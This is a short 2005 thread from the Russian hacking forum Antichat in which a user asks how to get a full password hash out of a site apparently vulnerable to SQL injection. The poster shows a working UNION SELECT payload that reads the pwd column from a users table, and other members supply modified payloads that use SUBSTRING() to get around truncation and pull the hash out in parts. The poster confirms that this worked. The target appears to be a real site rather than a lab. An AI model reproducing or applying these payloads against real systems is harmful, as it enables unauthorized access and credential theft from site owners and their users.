Форум АНТИЧАТ - вопрос по sql-injection

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - вопрос по sql-injection (https://forum.antichat.xyz/showthread.php?t=10735)

link.

13.11.2005 15:00

вопрос по sql-injection

Дело такое, нашел sql-inj ... подобрал колонки или т.д. и т.п., в итоге получился тако запрос:

Цитата:

-1'+union+select+1,2,pwd,4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*

но при таком запросе данные выводятся не полностью, а именно хеш выводится но без последних двух символов, если пробовать изменять limit то сразу выдается ошибка что неверное кол-во колонок..нужен хепл...

Zadoxlik

13.11.2005 15:41

Гм, а зачем тут вообще нужен лимит? И зачем "+" перед "/*"

И вообще обрезаться ничего не должно. Скорее всего обрез идет внутри самого скрипта

Trinux

13.11.2005 15:55

Да, обрезание (слово то какое хорошее) явно делается скриптом. Попробуй воткуть pwd в другое поле. Или юзаешь SUBSTRING() (http://dev.mysql.com/doc/refman/4.0/...functions.html)
т.е.
-1'+union+select+1,2,SUBSTRING(pwd, 0, 30),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
потом
-1'+union+select+1,2,SUBSTRING(pwd, 30, 2),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
вот вроде так

link.

13.11.2005 16:01

Trinux

SUBSTRING() помогло, огромный респект... =))

ну и +репутации =)

Время: 17:08